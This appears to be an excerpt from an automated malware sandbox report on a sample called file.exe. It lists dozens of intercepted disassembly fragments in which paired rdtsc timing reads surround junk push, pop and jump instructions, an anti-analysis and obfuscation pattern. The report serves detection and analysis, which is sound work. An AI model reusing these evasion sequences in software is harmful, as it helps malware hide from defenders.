                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6374E6 second address: 637519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F7E2CC83C9Ch 0x00000012 jmp 00007F7E2CC83CA2h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635776 second address: 63579A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jns 00007F7E2CD3B83Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6366BE second address: 6366D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E2CC83C9Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6366D6 second address: 6366E0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7E2CD3B83Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A40E second address: 63A433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7E2CC83C96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E2CC83CA8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E417 second address: 63E41C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E41C second address: 63E437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7E2CC83CA2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E592 second address: 63E596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E596 second address: 63E5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7E2CC83C96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E5A7 second address: 63E5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E5AD second address: 63E5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7E2CC83CA5h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E5CA second address: 63E5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E5D2 second address: 63E5DC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7E2CC83C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6429EF second address: 6429F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648E51 second address: 648E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648E57 second address: 648E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7E2CD3B836h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648E66 second address: 648E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648E6A second address: 648E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64926B second address: 649298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CC83CA9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 ja 00007F7E2CC83C96h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649298 second address: 64929D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64958B second address: 649591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649591 second address: 649597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649836 second address: 649859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F7E2CC83C9Dh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ebx 0x00000011 ja 00007F7E2CC83C9Eh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6227DA second address: 6227DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622AC4 second address: 622ACA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622BE8 second address: 622BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622BEF second address: 622C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007F7E2CC83CA6h 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C11 second address: 622C3A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7E2CD3B83Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F7E2CD3B83Dh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C3A second address: 622C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C56 second address: 622C69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B83Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C69 second address: 622CF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F7E2CC83C98h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 jnl 00007F7E2CC83C97h 0x00000036 call 00007F7E2CC83C99h 0x0000003b jmp 00007F7E2CC83CA5h 0x00000040 push eax 0x00000041 jmp 00007F7E2CC83C9Fh 0x00000046 mov eax, dword ptr [esp+04h] 0x0000004a push eax 0x0000004b push edx 0x0000004c jbe 00007F7E2CC83C98h 0x00000052 push esi 0x00000053 pop esi 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622E94 second address: 622EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], esi 0x00000009 mov dl, al 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622F95 second address: 622F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622F99 second address: 622FAF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7E2CD3B836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F7E2CD3B836h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622FAF second address: 622FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623198 second address: 62319E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62319E second address: 6231A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6231A2 second address: 6231AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623540 second address: 623544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623544 second address: 62356D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F7E2CD3B83Ch 0x0000000c jl 00007F7E2CD3B836h 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 sub di, 8919h 0x0000001b push 0000001Eh 0x0000001d mov ecx, dword ptr [ebp+122D2B9Fh] 0x00000023 push eax 0x00000024 push esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62356D second address: 623571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600F15 second address: 600F2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B842h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600F2E second address: 600F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64E838 second address: 64E83E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64E83E second address: 64E844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64EB1D second address: 64EB21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64ECAF second address: 64ECB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64ECB3 second address: 64ECE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B848h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F7E2CD3B838h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7E2CD3B83Ch 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64EFAE second address: 64EFB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64EFB4 second address: 64EFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654A39 second address: 654A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jc 00007F7E2CC83C98h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654A48 second address: 654A4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654A4D second address: 654A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jo 00007F7E2CC83C96h 0x0000000e popad 0x0000000f pushad 0x00000010 jne 00007F7E2CC83C96h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653A6F second address: 653A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653A73 second address: 653A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F7E2CC83C9Eh 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 jmp 00007F7E2CC83C9Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653480 second address: 653484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653484 second address: 653491 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653491 second address: 6534AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CD3B846h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6534AC second address: 653500 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E2CC83CACh 0x00000008 jmp 00007F7E2CC83CA4h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F7E2CC83C9Dh 0x00000017 push edx 0x00000018 jmp 00007F7E2CC83C9Bh 0x0000001d jmp 00007F7E2CC83CA6h 0x00000022 pop edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654724 second address: 65472A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65472A second address: 65473B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83C9Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65473B second address: 654757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F7E2CD3B836h 0x0000000e jmp 00007F7E2CD3B83Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65A189 second address: 65A198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F7E2CC83C96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65A198 second address: 65A19C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65A19C second address: 65A1A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658CA8 second address: 658CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658F66 second address: 658F70 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7E2CC83C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658F70 second address: 658F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658F76 second address: 658F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F7E2CC83C96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658F82 second address: 658F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6590D4 second address: 6590EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7E2CC83C9Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 659520 second address: 65953B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B847h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65953B second address: 659562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E2CC83C9Bh 0x0000000b push edi 0x0000000c jnl 00007F7E2CC83C96h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F7E2CC83C96h 0x0000001b jne 00007F7E2CC83C96h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 659562 second address: 659568 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6596BA second address: 6596D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CC83CA1h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6596D3 second address: 6596F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F7E2CD3B848h 0x0000000b jmp 00007F7E2CD3B842h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6596F0 second address: 6596FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65897E second address: 658982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658982 second address: 65898A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6622C1 second address: 6622CC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 665304 second address: 665323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 js 00007F7E2CC83C96h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7E2CC83C9Bh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CE8FF second address: 5CE92B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7E2CD3B844h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F7E2CD3B83Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664D72 second address: 664D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664D78 second address: 664D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664D7C second address: 664D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664D80 second address: 664D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664D86 second address: 664D9C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7E2CC83C98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F7E2CC83CA4h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 665036 second address: 665048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7E2CD3B836h 0x0000000a jp 00007F7E2CD3B836h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6673EE second address: 66740C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F7E2CC83CA4h 0x0000000b pop edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66740C second address: 66742C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7E2CD3B836h 0x0000000a jnc 00007F7E2CD3B836h 0x00000010 popad 0x00000011 popad 0x00000012 jbe 00007F7E2CD3B848h 0x00000018 jbe 00007F7E2CD3B842h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66742C second address: 667432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B413 second address: 66B41E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B41E second address: 66B423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66AE5F second address: 66AE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66AE63 second address: 66AE6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
